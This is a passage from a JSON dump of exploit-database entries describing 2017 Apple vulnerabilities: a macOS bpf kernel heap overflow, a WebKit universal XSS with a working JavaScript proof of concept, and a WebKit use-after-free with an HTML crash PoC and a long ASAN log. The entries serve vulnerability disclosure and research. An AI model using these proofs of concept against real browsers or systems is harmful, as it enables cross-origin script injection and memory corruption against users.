BPF_MINBUFSIZE;\n bcopy(&size, addr, sizeof (size));\n d->bd_bufsize = size;\n }\n break;\n \n\n``\n\nd->bd_bif is set to the currently attached interface, so we can't change the length if we're already attached to an interface.\n\nThere's no ioctl command to detach us from an interface, but we can just destroy the interface (by for example attaching to a bridge interface.) We can then call BIOCSBLEN again with a larger length which will set d->bd_bufsize to a new, larger value.\n\nIf we then attach to an interface again we hit this code in bpf_setif:\n\n`if (d->bd_sbuf == 0) { error = bpf_allocbufs(d); if (error != 0) return (error);`\n\nThis means that the buffers actually won't be reallocated since d->bd_sbuf will still point to the old buffer. This means that d->bd_bufsize is out of sync with the actual allocated buffer size leading to heap corruption when packets are receive on the target interface.\n\nThis PoC sets a small buffer length then creates and attaches to a bridge interface. It then destroys the bridge interface (which causes bpfdetach to be called on that interface, clearing d->bd_bif for our the bpf device.)\n\nWe then set a large buffer size and attach to the loopback interface and sent some large ping packets.\n\nThis bug is a root -> kernel priv esc\n\ntested on MacOS 10.12.3 (16D32) on MacbookAir5,2\n\nAnnex: [the bpf. c](<https://bugs.chromium.org/p/project-zero/issues/attachment?aid=270838>)\n", "cvss3": {}, "published": "2017-04-04T00:00:00", "type": "seebug", "title": "MacOS/iOS kernel heap overflow in bpf (CVE-2017-2482)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2482"], "modified": "2017-04-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92888", "id": "SSV:92888", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T12:00:20", "description": "The frame is not detached from an unloaded window. We can access to the new document's named properties via the following function.\r\n\r\n```\r\nstatic bool jsDOMWindowPropertiesGetOwnPropertySlotNamedItemGetter(JSDOMWindowProperties* thisObject, Frame& frame, ExecState* exec, PropertyName propertyName, PropertySlot& slot)\r\n{\r\n ...\r\n Document* document = frame.document(); <<-------- the new document.\r\n if (is<HTMLDocument>(*document)) {\r\n auto& htmlDocument = downcast<HTMLDocument>(*document);\r\n auto* atomicPropertyName = propertyName.publicName();\r\n if (atomicPropertyName && htmlDocument.hasWindowNamedItem(*atomicPropertyName)) {\r\n JSValue namedItem;\r\n if (UNLIKELY(htmlDocument.windowNamedItemContainsMultipleElements(*atomicPropertyName))) {\r\n Ref<HTMLCollection> collection = document->windowNamedItems(atomicPropertyName);\r\n ASSERT(collection->length() > 1);\r\n namedItem = toJS(exec, thisObject->globalObject(), collection);\r\n } else\r\n namedItem = toJS(exec, thisObject->globalObject(), htmlDocument.windowNamedItem(*atomicPropertyName));\r\n slot.setValue(thisObject, ReadOnly | DontDelete | DontEnum, namedItem);\r\n return true;\r\n }\r\n }\r\n\r\n return false;\r\n}\r\n```\r\n\r\nPoC:\r\n```\r\n\"use strict\";\r\n\r\nlet f = document.body.appendChild(document.createElement(\"iframe\"));\r\nlet get_element = f.contentWindow.Function(\"return logo;\");\r\n\r\nf.onload = () => {\r\n f.onload = null;\r\n\r\n let node = get_element();\r\n\r\n var sc = document.createElement(\"script\");\r\n sc.innerText = \"alert(location)\";\r\n node.appendChild(sc);\r\n};\r\n\r\nf.src = \"https://abc.xyz/\";\r\n```\r\nTested on Safari 10.0.2(12602.3.12.0.1).", "cvss3": {}, "published": "2017-04-04T00:00:00", "type": "seebug", "title": "Apple Webkit: UXSS by accessing a named property from an unloaded window (CVE-2017-2367)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2367"], "modified": "2017-04-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92881", "id": "SSV:92881", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T12:00:09", "description": "There is a use-after-free security vulnerability related to how the HTMLInputElement is handled in WebKit. The vulnerability was confirmed on a nightly build of WebKit. The PoC also crashes Safari 10.0.2 on Mac.\r\n\r\nPoC:\r\n\r\n```\r\n\r\n<script>\r\nfunction eventhandler1() {\r\n input.type = \"foo\";\r\n}\r\nfunction eventhandler2() {\r\n input.selectionStart = 25;\r\n}\r\n</script>\r\n<input id=\"input\" onfocus=\"eventhandler1()\" autofocus=\"autofocus\" type=\"tel\">\r\n<iframe onload=\"eventhandler2()\"></iframe>\r\n\r\n```\r\n\r\nASAN log (from WebKit nightly on Mac): \r\n\r\n```\r\n==26782==ERROR: AddressSanitizer: heap-use-after-free on address 0x60800005a3b4 at pc 0x000108e904ad bp 0x7fff5e5fa940 sp 0x7fff5e5fa938\r\nREAD of size 4 at 0x60800005a3b4 thread T0\r\n #0 0x108e904ac in WebCore::Node::getFlag(WebCore::Node::NodeFlags) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x84ac)\r\n #1 0x108e93568 in WebCore::Node::renderer() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xb568)\r\n #2 0x10ad2213a in WebCore::Node::renderBox() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1e9a13a)\r\n #3 0x109b9e2eb in WebCore::HTMLTextFormControlElement::setSelectionRange(int, int, WebCore::TextFieldSelectionDirection, WebCore::AXTextStateChangeIntent const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd162eb)\r\n #4 0x109b9db6a in WebCore::HTMLTextFormControlElement::setSelectionStart(int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd15b6a)\r\n #5 0x109afa97f in WebCore::HTMLInputElement::setSelectionStartForBindings(int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc7297f)\r\n #6 0x10a37a857 in WebCore::setJSHTMLInputElementSelectionStartFunction(JSC::ExecState&, WebCore::JSHTMLInputElement&, JSC::JSValue, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x14f2857)\r\n #7 0x10a3718af in bool WebCore::BindingCaller<WebCore::JSHTMLInputElement>::setAttribute<&(WebCore::setJSHTMLInputElementSelectionStartFunction(JSC::ExecState&, WebCore::JSHTMLInputElement&, JSC::JSValue, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, long long, long long, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x14e98af)\r\n #8 0x105a0ab58 in JSC::callCustomSetter(JSC::ExecState*, bool (*)(JSC::ExecState*, long long, long long), bool, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x70eb58)\r\n #9 0x105a0ac85 in JSC::callCustomSetter(JSC::ExecState*, JSC::JSValue, bool, JSC::JSObject*, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x70ec85)\r\n #10 0x1063edf95 in JSC::JSObject::putInlineSlow(JSC::ExecState*, JSC::PropertyName, JSC::JSValue, JSC::PutPropertySlot&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x10f1f95)\r\n #11 0x1065a2223 in llint_slow_path_put_by_id (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12a6223)\r\n #12 0x1065bdbfd in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12c1bfd)\r\n #13 0x1065c126c in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12c526c)\r\n #14 0x1065ba83a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12be83a)\r\n #15 0x10627947d in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf7d47d)\r\n #16 0x106203aa3 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf07aa3)\r\n #17 0x1058f5991 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x5f9991)\r\n #18 0x1058f5abb in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x5f9abb)\r\n #19 0x1058f5e06 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x5f9e06)\r\n #20 0x109f3ab2e in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x10b2b2e)\r\n #21 0x10a220786 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1398786)\r\n #22 0x10977ba05 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8f3a05)\r\n #23 0x10977b52f in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8f352f)\r\n #24 0x109744b35 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8bcb35)\r\n #25 0x109745c83 in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8bdc83)\r\n #26 0x1097456aa in WebCore::EventDispatcher::dispatchEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8bd6aa)\r\n #27 0x109679b62 in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7f1b62)\r\n #28 0x109588aef in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x700aef)\r\n #29 0x10958388e in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6fb88e)\r\n #30 0x1098ef3a1 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa673a1)\r\n #31 0x1098ec8da in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa648da)\r\n #32 0x1095a10ad in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7190ad)\r\n #33 0x109a9b79d in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc1379d)\r\n #34 0x10963624c in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7ae24c)\r\n #35 0x1095fa86f in WebCore::DocumentLoader::finishedLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x77286f)\r\n #36 0x1096028f5 in WebCore::DocumentLoader::maybeLoadEmpty() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x77a8f5)\r\n #37 0x109602cd7 in WebCore::DocumentLoader::startLoadingMainResource() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x77acd7)\r\n #38 0x1098f73a9 in WebCore::FrameLoader::continueLoadAfterNavigationPolicy(WebCore::ResourceRequest const&, WebCore::FormState*, bool, WebCore::AllowNavigationToInvalidURL) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa6f3a9)\r\n #39 0x10ae11275 in std::__1::function<void (WebCore::ResourceRequest const&, WebCore::FormState*, bool)>::operator()(WebCore::ResourceRequest const&, WebCore::FormState*, bool) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1f89275)\r\n #40 0x10ae110cf in WebCore::PolicyCallback::call(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1f890cf)\r\n #41 0x10ae12a6a in WebCore::PolicyChecker::continueAfterNavigationPolicy(WebCore::PolicyAction) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1f8aa6a)\r\n #42 0x101bc15ee in std::__1::function<void (WebCore::PolicyAction)>::operator()(WebCore::PolicyAction) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x5ac5ee)\r\n #43 0x101bc1446 in WebKit::WebFrame::didReceivePolicyDecision(unsigned long long, WebCore::PolicyAction, unsigned long long, WebKit::DownloadID) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x5ac446)\r\n #44 0x101bd181c in WebKit::WebFrameLoaderClient::dispatchDecidePolicyForNavigationAction(WebCore::NavigationAction const&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::PolicyAction)>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x5bc81c)\r\n #45 0x10ae1242a in WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, bool, WebCore::DocumentLoader*, WebCore::FormState*, std::__1::function<void (WebCore::ResourceRequest const&, WebCore::FormState*, bool)>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1f8a42a)\r\n #46 0x1098f6208 in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WebCore::FormState*, WebCore::AllowNavigationToInvalidURL) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa6e208)\r\n #47 0x1098f4eed in WebCore::FrameLoader::loadWithNavigationAction(WebCore::ResourceRequest const&, WebCore::NavigationAction const&, WebCore::LockHistory, WebCore::FrameLoadType, WebCore::FormState*, WebCore::AllowNavigationToInvalidURL) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa6ceed)\r\n #48 0x1098f1c39 in WebCore::FrameLoader::loadURL(WebCore::FrameLoadRequest const&, WTF::String const&, WebCore::FrameLoadType, WebCore::Event*, WebCore::FormState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa69c39)\r\n #49 0x1098f0210 in WebCore::FrameLoader::loadURLIntoChildFrame(WebCore::URL const&, WTF::String const&, WebCore::Frame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa68210)\r\n #50 0x101bd8805 in WebKit::WebFrameLoaderClient::createFrame(WebCore::URL const&, WTF::String const&, WebCore::HTMLFrameOwnerElement*, WTF::String const&, bool, int, int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x5c3805)\r\n #51 0x10b67e168 in WebCore::SubframeLoader::loadSubframe(WebCore::HTMLFrameOwnerElement&, WebCore::URL const&, WTF::String const&, WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x27f6168)\r\n #52 0x10b67c175 in WebCore::SubframeLoader::loadOrRedirectSubframe(WebCore::HTMLFrameOwnerElement&, WebCore::URL const&, WTF::AtomicString const&, WebCore::LockHistory, WebCore::LockBackForwardList) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x27f4175)\r\n #53 0x10b67bd87 in WebCore::SubframeLoader::requestFrame(WebCore::HTMLFrameOwnerElement&, WTF::String const&, WTF::AtomicString const&, WebCore::LockHistory, WebCore::LockBackForwardList) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x27f3d87)\r\n #54 0x109ae195c in WebCore::HTMLFrameElementBase::openURL(WebCore::LockHistory, WebCore::LockBackForwardList) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc5995c)\r\n #55 0x10921edb8 in WebCore::ContainerNode::notifyChildInserted(WebCore::Node&, WebCore::ContainerNode::ChildChangeSource) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x396db8)\r\n #56 0x10921d69a in WebCore::ContainerNode::parserAppendChild(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x39569a)\r\n #57 0x109a7309c in WebCore::executeInsertTask(WebCore::HTMLConstructionSiteTask&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbeb09c)\r\n #58 0x109a6c007 in WebCore::HTMLConstructionSite::executeQueuedTasks() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbe4007)\r\n #59 0x109a9cd48 in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc14d48)\r\n #60 0x109a9c902 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc14902)\r\n #61 0x109a9bb94 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc13b94)\r\n #62 0x109a9d58d in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc1558d)\r\n #63 0x10950a661 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x682661)\r\n #64 0x1096361f8 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7ae1f8)\r\n #65 0x1095fa86f in WebCore::DocumentLoader::finishedLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x77286f)\r\n #66 0x1090dafb7 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x252fb7)\r\n #67 0x1090d5b69 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x24db69)\r\n #68 0x10b6867e4 in WebCore::SubresourceLoader::didFinishLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x27fe7e4)\r\n #69 0x101ef3615 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(double)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(double)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x8de615)\r\n #70 0x101ef2c2a in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x8ddc2a)\r\n #71 0x1018a11f9 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x28c1f9)\r\n #72 0x1016c4448 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xaf448)\r\n #73 0x1016cd614 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xb8614)\r\n #74 0x106bb2a04 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18b6a04)\r\n #75 0x106bb4f1e in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18b8f1e)\r\n #76 0x7fff9632c7e0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0xaa7e0)\r\n #77 0x7fff9630bf1b in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x89f1b)\r\n #78 0x7fff9630b43e in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x8943e)\r\n #79 0x7fff9630ae37 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x88e37)\r\n #80 0x7fff8c19a934 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30934)\r\n #81 0x7fff8c19a76e in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x3076e)\r\n #82 0x7fff8c19a5ae in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x305ae)\r\n #83 0x7fff89fc5df5 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48df5)\r\n #84 0x7fff89fc5225 in -[NSApplication _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48225)\r\n #85 0x7fff89fb9d7f in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x3cd7f)\r\n #86 0x7fff89f83367 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x6367)\r\n #87 0x7fff82345193 in _xpc_objc_main (/usr/lib/system/libxpc.dylib+0x11193)\r\n #88 0x7fff82343bbd in xpc_main (/usr/lib/system/libxpc.dylib+0xfbbd)\r\n #89 0x1015fcb73 in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development+0x100001b73)\r\n #90 0x7fff89ec35ac in start (/usr/lib/system/libdyld.dylib+0x35ac)\r\n\r\n0x60800005a3b4 is located 20 bytes inside of 96-byte region [0x60800005a3a0,0x60800005a400)\r\nfreed by thread T0 here:\r\n #0 0x103bcfcf4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4bcf4)\r\n #1 0x106bfd36f in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x190136f)\r\n #2 0x10b85d0cb in WTF::RefPtr<WebCore::TextControlInnerTextElement>::operator=(std::nullptr_t) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x29d50cb)\r\n #3 0x10b85cfd9 in WebCore::TextFieldInputType::destroyShadowSubtree() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x29d4fd9)\r\n #4 0x109af255f in WebCore::HTMLInputElement::updateType() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc6a55f)\r\n #5 0x109af3972 in WebCore::HTMLInputElement::parseAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc6b972)\r\n #6 0x109710bff in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x888bff)\r\n #7 0x10971ef61 in WebCore::Element::didModifyAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x896f61)\r\n #8 0x109710698 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x888698)\r\n #9 0x10a379db6 in WebCore::setJSHTMLInputElementTypeFunction(JSC::ExecState&, WebCore::JSHTMLInputElement&, JSC::JSValue, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x14f1db6)\r\n #10 0x10a370eef in bool WebCore::BindingCaller<WebCore::JSHTMLInputElement>::setAttribute<&(WebCore::setJSHTMLInputElementTypeFunction(JSC::ExecState&, WebCore::JSHTMLInputElement&, JSC::JSValue, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, long long, long long, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x14e8eef)\r\n #11 0x105a0ab58 in JSC::callCustomSetter(JSC::ExecState*, bool (*)(JSC::ExecState*, long long, long long), bool, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x70eb58)\r\n #12 0x105a0ac85 in JSC::callCustomSetter(JSC::ExecState*, JSC::JSValue, bool, JSC::JSObject*, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x70ec85)\r\n #13 0x1063edf95 in JSC::JSObject::putInlineSlow(JSC::ExecState*, JSC::PropertyName, JSC::JSValue, JSC::PutPropertySlot&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x10f1f95)\r\n #14 0x1065a2223 in llint_slow_path_put_by_id (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12a6223)\r\n #15 0x1065bdbfd in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12c1bfd)\r\n #16 0x1065c126c in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12c526c)\r\n #17 0x1065ba83a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12be83a)\r\n #18 0x10627947d in 